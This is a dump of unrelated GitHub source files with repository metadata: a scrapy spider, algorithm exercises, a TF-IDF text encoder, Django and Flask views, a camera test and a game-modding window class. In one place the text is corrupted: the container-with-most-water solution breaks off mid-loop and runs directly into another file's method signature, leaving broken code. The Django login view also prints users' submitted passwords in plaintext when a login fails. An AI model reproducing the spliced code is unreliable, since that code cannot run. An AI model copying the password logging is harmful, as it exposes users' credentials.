line_array[0].replace('-', '_')\r\n code = line_array[1][2:].strip(';').strip('\"')\r\n\r\n icons.append((name, code))\r\n\r\n return icons\r\n\r\n\r\ndef save_icons(icons, filename):\r\n saved_count = 0\r\n\r\n with codecs.open(filename, encoding='utf-8', mode='w') as f:\r\n f.write(js_template_header)\r\n\r\n for icon_name, code in icons:\r\n if not is_blacklisted(icon_name):\r\n saved_count += 1\r\n f.write(\" '{0}': '\\\\u{1}',\\n\".format(icon_name, code))\r\n\r\n f.write(js_template_footer)\r\n\r\n print('Wrote {0} of {1} icons to {2}'.format(saved_count,\r\n len(icons), filename))\r\n\r\n\r\ndef download_font(url, filename):\r\n print('Downloading font...')\r\n\r\n response = requests.get(url)\r\n\r\n with open(filename, 'wb') as out_file:\r\n out_file.write(response.content)\r\n\r\n print('Wrote {0}'.format(filename))\r\n\r\n\r\nif __name__ == '__main__':\r\n icons = get_awesome_icons()\r\n save_icons(icons, 'awesome.js')\r\n\r\n download_font('http://github.com/FortAwesome/Font-Awesome/' +\r\n 'raw/master/fonts/FontAwesome.otf',\r\n 'fonts/fontawesome/FontAwesome.otf')\r\n","repo_name":"apertus-open-source-cinema/opencine","sub_path":"Source/Archive/MaterialTest/3rdParty/Material/modules/Material/make_awesome.py","file_name":"make_awesome.py","file_ext":"py","file_size_in_byte":2170,"program_lang":"python","lang":"en","doc_type":"code","stars":110,"dataset":"github-code","pt":"37"} +{"seq_id":"74167466347","text":"import time\n\nfrom ..until import until\nfrom urllib import parse\n\nfrom os.path import basename,splitext\nfrom scrapy_redis.spiders import RedisCrawlSpider\nfrom scrapy.contrib.spiders import Rule\nfrom scrapy.contrib.linkextractors import LinkExtractor\nfrom ..items import *\n# from scrapy.loader import ItemLoader\n\nfrom tutorial.settings import *\n\nclass Base(RedisCrawlSpider):\n \"\"\"Spider that reads urls from redis queue (myspider:start_urls).\"\"\"\n name = 'base'\n redis_key = 'base:start_urls'\n allowed_domains = ALLOWED_DOMAINS\n\n rules = (\n # follow all links\n Rule(LinkExtractor(deny=('english.dhu.edu.cn')), callback='parse_page', follow=True),\n )\n\n def parse_test(self, response):\n print(response.url)\n\n def get_page_item(self, response):\n nowtime = time.time()\n url = response.url\n origin = parse.urlparse(url).netloc\n\n _str = '<__split>'\\\n 'data: {}\\n' \\\n 'url: {}\\n' \\\n 'origin: {}\\n' \\\n '<\\__split>\\n'\\\n '\\n' \\\n .format(nowtime, url, origin)\n return _str\n\n def parse_page(self, response):\n\n page = until.md5(response.url.encode())\n # print(response.url)\n\n until.save_file(path=ALL_FILE_PATH, name=page + '.sraw', content=self.get_page_item(response).encode() + response.body)\n\n urlItem = InformationItem()\n urlItem['urls'] = parse.quote_plus(response.url)\n yield urlItem\n\n links = response.xpath('//a')\n for index, alink in enumerate(links):\n href = alink.xpath('@href').extract_first()\n path = parse.urlparse(href).path\n filename = '%s' % basename(path)\n extrename = splitext(filename)[1]\n\n if extrename in INCLUDE_FILE_TYPE:\n name = alink.xpath('text()').extract_first()\n fileItem = self.getFileItem(self.cutHref(href, response.url), name)\n yield fileItem\n\n\n\n def getFileItem(self, file_urls=None, name=None):\n fileItem = FileItem()\n if file_urls is None or name is None:\n return fileItem\n else:\n fileItem['file_urls'] = [file_urls] # 必须为一个list\n fileItem['name'] = name\n return fileItem\n\n def cutHref(self, href='', url=''):\n if until.isHasHttpOrHttps(href):\n return href\n return parse.urljoin(url, 
href.strip())\n\n","repo_name":"maiff/crawl_Search_Enginee","sub_path":"tutorial/spiders/Base.py","file_name":"Base.py","file_ext":"py","file_size_in_byte":2449,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"74220023148","text":"import collections\nimport zarr\nfrom gunpowder import ArrayKey\n\n\nclass Label(object):\n def __init__(\n self,\n labelname,\n labelid,\n generic_label=None,\n targetid=None,\n thr=128,\n scale_loss=True,\n scale_key=None,\n add_constant=None,\n separate_labelset=False,\n frac_pos=0.5,\n frac_neg=0.5,\n ):\n\n self.labelname = labelname\n if not isinstance(labelid, collections.Iterable) and labelid is not None:\n labelid = (labelid,)\n self.labelid = labelid\n if generic_label is not None and not isinstance(\n generic_label, collections.Iterable\n ):\n generic_label = (generic_label,)\n self.generic_label = generic_label\n self.targetid = targetid\n self.thr = thr\n self.separate_labelset = separate_labelset\n if self.separate_labelset and self.separate_labelset is not None:\n self.gt_key = ArrayKey(\"GT_\" + self.labelname.upper())\n elif not self.separate_labelset and self.separate_labelset is not None:\n self.gt_key = ArrayKey(\"GT_LABELS\")\n else:\n self.gt_key = None\n self.gt_dist_key = ArrayKey(\"GT_DIST_\" + self.labelname.upper())\n self.pred_dist_key = ArrayKey(\"PRED_DIST_\" + self.labelname.upper())\n self.mask_key = ArrayKey(\"MASK_\" + self.labelname.upper())\n self.scale_loss = scale_loss\n self.add_constant = add_constant\n self.frac_pos = frac_pos\n self.frac_neg = frac_neg\n # self.data_dir = data_dir\n # self.data_sources = data_sources\n # self.total_voxels = compute_total_voxels(self.data_dir, self.data_sources)\n num = 0\n # if data_sources is not None:\n # for ds in data_sources:\n # zf = z5py.File(ds.full_path, use_zarr_format=False)\n # for l in labelid:\n # if l in zf[\"volumes/labels/all\"].attrs[\"relabeled_ids\"]:\n # num += zf[\"volumes/labels/all\"].attrs[\"relabeled_counts\"][\n # zf[\"volumes/labels/all\"].attrs[\"relabeled_ids\"].index(l)\n # ]\n # if num > 0:\n # self.class_weight = float(self.total_voxels) / num\n # else:\n # self.class_weight = 0.0\n # print(labelname, self.class_weight)\n\n if self.scale_loss:\n self.scale_key = ArrayKey(\"SCALE_\" + self.labelname.upper())\n if scale_key is not None:\n self.scale_key = scale_key\n if not self.scale_loss and scale_key is None:\n self.scale_key = self.mask_key\n\n\ndef filter_by_category(list_of_datasets, category):\n filtered = []\n for ds in list_of_datasets:\n if category in ds.special_categories:\n filtered.append(ds)\n return filtered\n\n\ndef compute_total_voxels(data_dir, data_sources):\n voxels = 0\n if data_sources is not None:\n for ds in data_sources:\n zf = zarr.open(ds.full_path, mode=\"r\")\n try:\n for c in zf[\"volumes/labels/all\"].attrs[\"orig_counts\"]:\n voxels += c\n except KeyError as e:\n raise e\n return voxels\n","repo_name":"saalfeldlab/CNNectome","sub_path":"CNNectome/utils/label.py","file_name":"label.py","file_ext":"py","file_size_in_byte":3231,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"37"} +{"seq_id":"7936662961","text":"import sys\nsys.stdin = open('2178.txt', 'r')\n\nN, M = map(int, input().split())\nL = []\nfor i in range(N):\n tmp = list(input())\n L += [list(map(int, tmp))]\n\ndir = [(-1, 0), (1, 0), (0, -1), (0, 1)] # 좌, 우, 상, 하\n\n\ndef bfs(j, i):\n cnt = 1\n q = [(j, i)]\n vst = [[0]*M for _ in range(N)]\n vst[i][j] = 1\n\n 
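Portability note for label.py above (not in the original): collections.Iterable was removed in Python 3.10, so on modern Python the isinstance checks in Label.__init__ need the collections.abc module instead.

from collections.abc import Iterable

if not isinstance(labelid, Iterable) and labelid is not None:
    labelid = (labelid,)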
while q:\n        for _ in range(len(q)):\n            cur = q.pop(0)\n            for d in dir:\n                xx = cur[0] + d[0]\n                yy = cur[1] + d[1]\n                if 0 <= xx < M and 0 <= yy < N:\n                    if xx == M-1 and yy == N-1:\n                        cnt += 1\n                        return cnt\n                    if vst[yy][xx] == 0 and L[yy][xx] == 1:\n                        q.append((xx, yy))\n                        vst[yy][xx] = 1\n        cnt += 1\n\n\nprint(bfs(0, 0))","repo_name":"anyl92/ALGORITHM","sub_path":"baek/baek_2178_miro.py","file_name":"baek_2178_miro.py","file_ext":"py","file_size_in_byte":835,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"43859366904","text":"#!/usr/bin/python3\n'''utf-8 validation'''\n\n\nimport math\n\n\ndef validUTF8(data):\n    '''Return True if data (a list of ints, one byte per int) is a valid UTF-8 encoding'''\n    # lis = []\n    if data == []:\n        return True\n    if not isinstance(data, list):\n        return False\n    lis2 = []\n    lis3 = []\n    for x in data:\n        if type(x) is not int:\n            return False\n        if x < 0:\n            return False\n        # x == 0 needs no special case: it becomes the all-zero byte below\n        lis = []\n        while x > 0:\n            res = x % 2\n            lis.append(res)\n            x = math.floor(x / 2)\n            if x < 0:\n                break\n        lis2 = lis[::-1]\n        if len(lis2) > 8:\n            lis2 = lis2[-8:]  # only the 8 least significant bits encode the byte\n        lis4 = []\n        if len(lis2) < 8:\n            rem = 8 - len(lis2)\n            for i in range(rem):\n                lis4.append(0)\n            # lis2.append(0)\n        lis4.extend(lis2)\n        lis3.append(lis4)\n        # lis2[:0] = [1]\n    # print(lis3)\n    no = 0\n    for list_item in lis3:\n        # print (list_item.index(0))\n        if 0 not in list_item:\n            # a byte of all ones (0xff) is never valid UTF-8\n            return False\n        if no == 0:\n            if (list_item.index(0)) == 0:\n                # no = 1\n                continue\n            elif (list_item.index(0)) == 2:\n                no = 1\n            elif (list_item.index(0)) == 3:\n                no = 2\n            elif (list_item.index(0)) == 4:\n                no = 3\n            else:\n                return False\n        else:\n            if (list_item.index(0)) != 1:\n                return False\n            no -= 1\n    return no == 0\n","repo_name":"joyogbu/alx-interview","sub_path":"0x04-utf8_validation/0-validate_utf8.py","file_name":"0-validate_utf8.py","file_ext":"py","file_size_in_byte":1544,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71942460268","text":"'''\nCreated on 2016-01-11\n\n@author: Darren\n'''\n'''\nGiven n non-negative integers a1, a2, ..., an, where each represents a point at coordinate (i, ai). \nn vertical lines are drawn such that the two endpoints of line i are at (i, ai) and (i, 0). 
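Note: You may not slant the container. 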
\nFind two lines, which together with x-axis forms a container, such that the container contains the most water.\n\n'''\nclass Solution(object):\n def maxArea(self, height):\n \"\"\"\n :type height: List[int]\n :rtype: int\n \"\"\"\n if not height or len(height)<2:\n return 0\n left,right=0,len(height)-1\n res=0\n while left str:\n \"\"\"\n This removes URL links from the text\n\n :param in_doc: Free text\n :type in_doc: str\n :return: Text after removing URL's\n :rtype: str\n \"\"\"\n return re.sub(pattern=r\"http\\S+\", repl=\"\", string=in_doc)\n\n @staticmethod\n def remove_emails(in_doc: str) -> str:\n \"\"\"\n This removes email addresses from the free text\n\n :param in_doc: Free text\n :type in_doc: str\n :return: Text after removing email addresses\n :rtype: str\n \"\"\"\n return re.sub(pattern=r\"\\S*@\\S*\\s?\", repl=\"\", string=in_doc)\n\n @staticmethod\n def remove_non_ascii(in_doc: str) -> str:\n \"\"\"\n This method removes all non ascii characters from the text\n\n :param in_doc: Free text\n :type in_doc: str\n :return: Text after removing the non ascii characters\n :rtype: str\n \"\"\"\n normal_doc = unicodedata.normalize(\"NFKD\", in_doc)\n encoded_doc = normal_doc.encode(encoding=\"ascii\", errors=\"ignore\")\n decoded_doc = encoded_doc.decode(\"utf-8\", \"ignore\")\n return decoded_doc\n\n @staticmethod\n def remove_punctuations(in_doc: str) -> str:\n \"\"\"\n This method removes all the punctuations from the text\n\n :param in_doc: Free text\n :type in_doc: str\n :return: Text after removing punctuations\n :rtype: str\n \"\"\"\n return re.sub(pattern=r\"[^\\w\\s]\", repl=\"\", string=in_doc)\n\n @staticmethod\n def remove_digits(in_doc: str) -> str:\n \"\"\"\n To remove numerical characters from the free text\n\n :param in_doc: Free text\n :type in_doc: str\n :return: Text after removing the numerical characters\n :rtype: str\n \"\"\"\n return \"\".join([c for c in in_doc if not c.isdigit()])\n\n def remove_stopwords(self, in_doc: str) -> str:\n \"\"\"\n To remove stop words from text\n\n :param in_doc: Free text\n :type in_doc: str\n :return: Text after removing stop words\n :rtype: str\n \"\"\"\n words_list = in_doc.split(sep=\" \")\n return \" \".join(\n [word for word in words_list if word not in self.stopwords_list]\n )\n\n def clean_text(self, doc: str) -> str:\n \"\"\"\n This method applies text cleaning tools on the free text and returns a cleaned\n text\n\n :param doc: Free text\n :type doc: str\n :return: Text after passing it through multiple text cleaning tools\n :rtype: str\n \"\"\"\n doc = self.remove_url(in_doc=doc)\n doc = self.remove_emails(in_doc=doc)\n doc = self.remove_non_ascii(in_doc=doc)\n doc = self.remove_punctuations(in_doc=doc)\n doc = self.remove_digits(in_doc=doc)\n\n # Replace multiple white spaces with single white space\n doc = re.sub(pattern=r\" +\", repl=\" \", string=doc)\n\n # Convert text to lower case\n doc = doc.lower()\n\n doc = self.remove_stopwords(in_doc=doc)\n return doc\n\n @staticmethod\n def docs_empty(docs: list) -> bool:\n \"\"\"\n To check if the list of documents have no content\n\n :param docs: The list of documents to be checked\n :type docs: list\n :return: Whether the documents have no content\n :rtype: bool\n \"\"\"\n if all(\"\" == s or s.isspace() for s in docs):\n return True\n\n return False\n\n def encode_documents(self, documents) -> dict:\n \"\"\"\n This method cleans the free text and then vectorize into a matrix using TF-IDF\n approach\n\n :param documents: List of free text documents\n :type documents: 
list\n        :return: A dictionary containing two objects:\n        `features` -- A list of all the words or tokens from the entire corpus, and\n        `vectors` -- A TF-IDF matrix from the cleaned text\n        :rtype: dict\n        \"\"\"\n        sanitised_documents = [self.clean_text(doc=doc) for doc in documents]\n        if self.docs_empty(docs=sanitised_documents):\n            return {\n                \"features\": [],\n                \"vectors\": csr_matrix((len(sanitised_documents), 0), dtype=np.float32),\n            }\n\n        vectorizer = TfidfVectorizer(dtype=np.float32)\n        vectors = vectorizer.fit_transform(raw_documents=sanitised_documents)\n        return {\"features\": vectorizer.get_feature_names(), \"vectors\": vectors}\n","repo_name":"riyuexing/totara","sub_path":"extensions/ml_service/service/recommender/data_subroutines/text_encoder.py","file_name":"text_encoder.py","file_ext":"py","file_size_in_byte":4983,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"74153904426","text":"import gym\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\n\nfrom models import CQLAgent\nfrom utils import eval_policy, register_custom_envs\n\n\ndef plot_params():\n    alphas = [0.5, 1.0, 3.0, 5.0, 10.0]\n    df_dict = dict()\n    for alpha in alphas:\n        df = pd.read_csv(f\"logs/cql/cql_alpha{alpha}.csv\", index_col=0)\n        df_dict[alpha] = df\n\n    cols = [\"reward\", \"mse_loss\", \"cql_loss\", \"avg_ood_Q\", \"avg_Q\", \"avg_target_Q\"]\n    _, axes = plt.subplots(nrows=2, ncols=3, figsize=(16, 8))\n    for alpha in alphas:\n        for idx, col in enumerate(cols):\n            ax = axes[idx//3][idx%3]\n            df = df_dict[alpha]\n            ax.plot(df[\"step\"].values/1e5, df[col].values, label=f\"{alpha}\")\n            ax.legend()\n            ax.set_title(col)\n    plt.savefig(\"demo.png\", dpi=360)\n\n\ndef plot_trajs():\n    register_custom_envs()\n    env = gym.make(\"PointmassHard-v2\")\n    obs_dim = np.prod(env.observation_space.shape)\n    act_dim = env.action_space.n\n    agent = CQLAgent(obs_dim=obs_dim, act_dim=act_dim)\n    raw_reward = eval_policy(agent, env)\n    agent.load(\"saved_models/cql/cql_s42\")\n    for _ in range(21):\n        _ = eval_policy(agent, env)\n    env.plot_trajectories(\"imgs/cql_trajs.png\")\n\n\nif __name__ == \"__main__\":\n    plot_trajs()\n","repo_name":"fuyw/jrlzoo","sub_path":"awac/discrete/torch/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":1271,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"37"} +{"seq_id":"70384586987","text":"# Expected Time Complexity : O(N^(1/2))\r\n# Expected Auxiliary Space : O(1)\r\n\r\nimport math\r\n\r\n\r\ndef isPrime(N):\r\n    # Your code here\r\n    if N == 1:\r\n        # 1 is not a prime number\r\n        return False\r\n    for i in range(2, 1 + int(math.sqrt(N))):\r\n        if N % i == 0:\r\n            return False\r\n    return True\r\n\r\n\r\nnum = 15\r\nprint(isPrime(num))\r\n","repo_name":"arnabbarui5/Data-Structures-and-Algotithms-GFG","sub_path":"Python GFG/Mathematics/Primality Test.py","file_name":"Primality Test.py","file_ext":"py","file_size_in_byte":319,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"73992588587","text":"# from multiprocessing import context\n# from cProfile import Profile\n# from multiprocessing import context\n# import re\n# import re\n# from cProfile import Profile\nfrom email import message\n# from tkinter.messagebox import RETRY\nfrom urllib.request import Request\nfrom django import forms\nfrom django.contrib import messages\nfrom django.shortcuts import render,redirect\nfrom django.urls import reverse\nfrom django.db.models import Q\n\nfrom .forms import UserGet\n\nfrom 
django.contrib.auth.models import User\n\nfrom django.contrib.auth import authenticate, login, logout\n\nfrom django.http import HttpResponseRedirect, HttpResponse\n\nfrom django.contrib.auth.decorators import login_required\n\nfrom django.http import HttpResponse\n# from matplotlib.style import use\n# from matplotlib.style import use\n# from responses import registered\n# from matplotlib.style import use\n\nfrom .models import Room, Topic,Topic2, User2,Webpage,Message,AccessRecord,UserProfileInfo\nfrom .forms import RoomForm, UserForm, UserProfileInfoForm\nfrom .furm import FormNAme\nfrom base import furm\nfrom .furm import User2Form\n\n\n# Create your views here.\n# from studybud import \n\n\n\n# Create your views here.\n# def home(request):\n#     return HttpResponse(\"Home Page\")\n\n# def products(request):\n#     return HttpResponse(\"product\")\n\n# def customer(request):\n#     return HttpResponse(\"customer\")\n\n# rooms = [\n#     {'id' : 1, 'name' : 'Lets Learn Python'},\n#     {'id' : 2, 'name' : 'Design with me '},\n#     {'id' : 3, 'name' : 'Front end developer'},\n\n# ]\ndef loginPage(request):\n    \n\n    if request.method == 'POST':\n\n        username = request.POST.get('username')\n        password = request.POST.get('password')\n\n        try:\n            user = User.objects.get(username=username)\n        except User.DoesNotExist:\n            messages.error(request, 'User does not exist')\n\n        user = authenticate(request, username=username, password=password)\n\n        if user is not None:\n            # if user.is_active:\n            login(request, user)\n            return redirect('home')\n        else:\n            messages.error(request, 'Username or password does not exist')\n    \n    context = {}\n\n    return render(request , 'accounts/login_register.html', context)\n\ndef home(request):\n\n    q = request.GET.get('q') if request.GET.get('q') is not None else ''\n\n\n    rooms = Room.objects.filter(\n        Q(topic__name__icontains=q) |\n        Q(name__icontains=q) |\n        Q(discription__icontains=q)\n    )\n\n\n    topics = Topic.objects.all()\n\n    room_count = rooms.count()\n    context = {'rooms' : rooms , 'topics': topics, 'room_count':room_count}\n    return render(request , 'accounts/dashboard.html' , context)\n\ndef room(request , pk ):\n    room = Room.objects.get(id=pk)\n\n    # room = None\n    # for i in rooms:\n    #     if i['id'] == int(pk):\n    #         room = i\n    context = {'room' : room}\n    return render (request , 'accounts/room.html' , context)\n    \n\ndef createRoom(request):\n    form = RoomForm()\n    if request.method == 'POST':\n        # print(request.POST)\n        form = RoomForm(request.POST)\n        if form.is_valid():\n            form.save()\n            return redirect('home')\n\n    context = {'form' : form}\n\n\n    return render (request , 'accounts/room_form.html' , context)\n\ndef updateRoom(request, pk):\n    room = Room.objects.get(id=pk)\n    form =RoomForm(instance=room)\n    if request.method == 'POST':\n        form = RoomForm(request.POST, instance=room)\n        if form.is_valid():\n            form.save()\n            return redirect('home') \n\n    context = {'form': form}\n\n\n    return render(request, 'accounts/room_form.html', context)\n\ndef deleteRoom(request, pk):\n    room = Room.objects.get(id=pk)\n    if request.method == 'POST':\n        room.delete()\n        return redirect('home')\n\n    context = {'obj': room}\n\n    return render(request, 'accounts/delete.html', context)\n\n\n\n\n\n\n\n\ndef user_email(request):\n\n    user_list = User2.objects.order_by('first_name')\n    user_dict = {'users1': user_list}\n\n\n    return render(request , 'accounts/home.html', context=user_dict)\n\n\ndef form_name_view(request):\n    form = User2Form()\n    if request.method == 'POST':\n        # print(request.POST)\n        form = User2Form(request.POST)\n        if form.is_valid():\n            form.save()\n            
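# on success, redirect (post/redirect/get) so a browser refresh cannot re-submit the form\n            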
return redirect('home')\n\n    context = {'form' : form}\n\n\n    return render (request , 'accounts/furm.html' , context=context)\n\n\n\n\n\n\ndef filter(request):\n    context_dict = { 'text' : 'hello world' , 'number': 100 }\n\n    return render(request , 'accounts/filter.html' , context=context_dict)\n\n\ndef index(request):\n    return redirect('home')\n\n    # return render(request , 'accounts/index.html')  # unreachable after the redirect above\n\n\n@login_required\ndef special(request):\n\n    return HttpResponse('You are logged in. Nice!')\n\n\n\n@login_required\ndef user_logout(request):\n    logout(request)\n\n    return HttpResponseRedirect(reverse('home'))\n\ndef registration(request):\n\n    registered = False\n\n    if request.method == 'POST':\n        user_form = UserForm(data=request.POST)\n        profile_form = UserProfileInfoForm(data= request.POST)\n\n        if user_form.is_valid() and profile_form.is_valid():\n            user = user_form.save()\n            user.set_password(user.password)\n            user.save()\n\n            profile = profile_form.save(commit=False)\n            profile.user = user\n\n            if 'profile_pic' in request.FILES:\n                profile.profile_pic = request.FILES['profile_pic']\n\n            profile.save()\n\n            registered = True \n        else:\n            \n            print(user_form.errors, profile_form.errors)\n    else:\n        user_form = UserForm()\n\n        profile_form = UserProfileInfoForm()\n\n    \n\n\n\n    \n\n    return render(request, 'accounts/registration.html',\n                          {'user_form': user_form,\n                           'profile_form': profile_form,\n                           'registered' : registered})\n\n\n\ndef user_login(request):\n\n    if request.method == 'POST':\n\n        username = request.POST.get('username')\n        password = request.POST.get('password')\n\n\n        user = authenticate(username=username, password=password)\n\n\n        if user:\n            if user.is_active:\n                login(request, user)\n                return HttpResponseRedirect(reverse('home'))\n\n            else:\n                return HttpResponse('ACCOUNT NOT ACTIVE')\n\n        else:\n            print(\"Someone tried to log in and failed\")\n\n            # avoid logging raw passwords outside local debugging\n            print(\"Username: {} and Password {}\".format(username,password))\n\n            return HttpResponse(\"Invalid login details supplied\")\n    else:\n        return render(request , 'accounts/login.html', {})\n\n\n\n\n# def loginPage(request):\n\n\n#     if request.method == 'POST':\n\n#         username = request.POST.get('username')\n#         password = request.POST.get('password')\n\n#         try:\n#             user = User.objects.get(username=username)\n#         except:\n#             messages.error(request, 'User does not exist')\n\n#         user = authenticate(request, username=username, password=password)\n\n#         if user is not None:\n#             login(request, user)\n#             return redirect('home')\n#         else:\n#             messages.error(request, 'Username or password does not exist')\n    \n#     context = {}\n\n#     return render(request , 'accounts/login_register.html', context)\n\n\n\n\n    # form = furm.FormNAme()\n\n\n\n    # # constext = {'form': form}\n    # if request.method == 'POST':\n    #     form = furm.FormNAme(request.POST)\n    #     if form.is_valid:\n    #         print(\"Success post\")\n    #         print(\"Name:\" +form.cleaned_data['name'])\n    #         print(\"Email:\" +form.cleaned_data['email'])\n    #         print(\"Text:\" +form.cleaned_data['text'])\n\n\n\n\n    #         form.cleaned_data['name']\n    #     return render(request , 'accounts/furm.html', {'form': form})\n    \n\n\n    \n\n# def customer(request):\n#     return render(request,\"accounts/customer.html\")\n\n# def index(request):\n#     my_dict = {'insert_me' : \"Hello I am from view.py\"}\n\n#     return render(request , 'accounts/index.html' , context=my_dict)\n\n\n","repo_name":"ammarp03/django-deployment-example","sub_path":"base/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8090,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} 
+{"seq_id":"42090689122","text":"n = int(input())\ntemp = str(n)\n \nresult1 = 0\nresult2 = 0\nmid = len(temp) // 2\nfor i in range(mid):\n result1 += int(temp[i])\n\nfor i in range(mid,len(temp)):\n result2 += int(temp[i])\n\nif result1 == result2:\n print(\"LUCKY\")\nelse:\n print(\"READY\")","repo_name":"subinmun1997/my_python-for-coding-test","sub_path":"CodingTest/Implementation/solution5.py","file_name":"solution5.py","file_ext":"py","file_size_in_byte":255,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"1197865888","text":"import time\nimport cv2\n\n\"\"\" \ngstreamer_pipeline returns a GStreamer pipeline for capturing from the CSI camera\nFlip the image by setting the flip_method (most common values: 0 and 2)\ndisplay_width and display_height determine the size of each camera pane in the window on the screen\nDefault 1920x1080 displayd in a 1/4 size window\n\"\"\"\n\ndef gstreamer_pipeline(\n sensor_id=0,\n capture_width=1920,\n capture_height=1080,\n display_width=960,\n display_height=540,\n framerate=30,\n flip_method=0,\n):\n return (\n \"nvarguscamerasrc sensor-id=%d !\"\n \"video/x-raw(memory:NVMM), width=(int)%d, height=(int)%d, framerate=(fraction)%d/1 ! \"\n \"nvvidconv flip-method=%d ! \"\n \"video/x-raw, width=(int)%d, height=(int)%d, format=(string)BGRx ! \"\n \"videoconvert ! \"\n \"video/x-raw, format=(string)BGR ! appsink\"\n % (\n sensor_id,\n capture_width,\n capture_height,\n framerate,\n flip_method,\n display_width,\n display_height,\n )\n )\n\ndef show_camera():\n # To flip the image, modify the flip_method parameter (0 and 2 are the most common)\n #pipeline = gstreamer_pipeline(flip_method=2)\n #print(pipeline)\n #video_capture = cv2.VideoCapture(pipeline, cv2.CAP_GSTREAMER)\n video_capture = cv2.VideoCapture(0)\n #video_capture = cv2.VideoCapture(\"http://192.168.227.41:8080/video\")\n if video_capture.isOpened():\n ret_val, frame = video_capture.read()\n cv2.imwrite(\"camera.test.png\", frame)\n print(\"done\")\n video_capture.release()\n cv2.destroyAllWindows()\n else:\n print(\"Error: Unable to open camera\")\n\nif __name__ == \"__main__\":\n show_camera()","repo_name":"woflydev/odyssey_cnn","sub_path":"w_testcam.py","file_name":"w_testcam.py","file_ext":"py","file_size_in_byte":1737,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"11130661455","text":"#DEMO: \n# -how to make use of (jinja2) templates in Flask to develop markup efficiently\n# -separation of concerns (python code is separated from markup completely) using templates\n\n#packages needed to install\n#>pip install flask\n#>pip install mysql-connector-python\n\n#you can run this app with the following (and navigate to http://localhost:8080 in browser)\n#>python app.py\n\n\nfrom flask import Flask, render_template #necessary to work with template\nimport dbaccess as db\napp = Flask(__name__,\n static_url_path='/content', #this can be empty string if we want \"images/title.png\" directly\n static_folder='static', #map the static folder to serve files directly\n template_folder='templates' #map the templates folder so that flask picks up templates from here\n )\n\n@app.route(\"/\") #define \"root\" (or home) route (using \"route\" decorator)\ndef home(): #this function gets executed for the above route\n dbResult = db.executeQuery(\"SELECT * FROM sample.emp\") #fetch rows\n if dbResult is None:\n return \"Sorry! 
some problem\"\n else:\n #render template as string\n #the template uses variable \"employees\" (which contain rows) to pull data for rendering\n return render_template('employees.html', employees=dbResult) \n\nif __name__ == \"__main__\":\n app.run(host=\"0.0.0.0\", port=8080)","repo_name":"jagchat/python","sub_path":"flask/05-using-templates/src/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1395,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"9120930020","text":"from __future__ import annotations\n\n__all__ = [\"ProjectWindow\"]\n\nimport abc\nimport logging\nimport re\nimport subprocess\nimport sys\nimport threading\nimport time\nimport typing as tp\nfrom pathlib import Path\nfrom queue import Queue\n\nfrom soulstruct.containers import Binder\nfrom soulstruct.utilities.text import word_wrap\nfrom soulstruct.utilities.window import SmartFrame\n\nfrom .editors import (\n AIEditor,\n EntityEditor,\n EventEditor,\n LightingEditor,\n MapsEditor,\n ParamsEditor,\n TalkEditor,\n TextEditor,\n)\nfrom .exceptions import SoulstructProjectError, RestoreBackupError\nfrom .icon import SOULSTRUCT_ICON\nfrom .links import WindowLinker # TODO: Move to base, with game subclasses\n\nif tp.TYPE_CHECKING:\n from .core import GameDirectoryProject\n from .runtime import RuntimeManager\n\n_LOGGER = logging.getLogger(__name__)\n\n\nTAB_EDITORS = {\n \"maps\": MapsEditor,\n \"entities\": EntityEditor,\n \"params\": ParamsEditor,\n \"lighting\": LightingEditor,\n \"text\": TextEditor,\n \"events\": EventEditor,\n \"ai\": AIEditor,\n \"talk\": TalkEditor,\n} # also specifies tab order (\"runtime\" always comes last, followed by any other game-specific extras)\n\n\nclass ProjectWindow(SmartFrame, abc.ABC):\n\n PROJECT_CLASS: tp.Type[GameDirectoryProject] = None\n LINKER_CLASS: tp.Type[WindowLinker] = WindowLinker\n MAPS_EDITOR_CLASS: tp.Type[MapsEditor] = MapsEditor\n ENTITIES_EDITOR_CLASS: tp.Type[EntityEditor] = EntityEditor\n PARAMS_EDITOR_CLASS: tp.Type[ParamsEditor] = ParamsEditor\n LIGHTING_EDITOR_CLASS: tp.Type[LightingEditor] = LightingEditor\n TEXT_EDITOR_CLASS: tp.Type[TextEditor] = TextEditor\n EVENT_EDITOR_CLASS: tp.Type[EventEditor] = EventEditor\n AI_EDITOR_CLASS: tp.Type[AIEditor] = AIEditor\n TALK_EDITOR_CLASS: tp.Type[TalkEditor] = TalkEditor\n RUNTIME_MANAGER_CLASS: tp.Type[RuntimeManager] = None\n EXTRA_TAB_CLASSES = {} # maps tab names to classes\n CHARACTER_MODELS = {}\n\n maps_tab: tp.Optional[MapsEditor]\n entities_tab: tp.Optional[EntityEditor]\n params_tab: tp.Optional[ParamsEditor]\n lighting_tab: tp.Optional[LightingEditor]\n text_tab: tp.Optional[TextEditor]\n events_tab: tp.Optional[EventEditor]\n ai_tab: tp.Optional[AIEditor]\n talk_tab: tp.Optional[TalkEditor]\n runtime_tab: tp.Optional[RuntimeManager]\n\n def __init__(self, project_path=\"\", game_root=None, master=None):\n super().__init__(\n master=master,\n toplevel=True,\n icon_data=SOULSTRUCT_ICON,\n window_title=f\"{self.PROJECT_CLASS.GAME.name} Project Editor\",\n )\n self.withdraw()\n\n if not project_path:\n self.CustomDialog(\n title=\"Choose Soulstruct project directory\",\n message=\"Navigate to your Soulstruct project directory.\\n\\n\"\n + word_wrap(\n \"If you want to create a new project, create an empty directory and select it. 
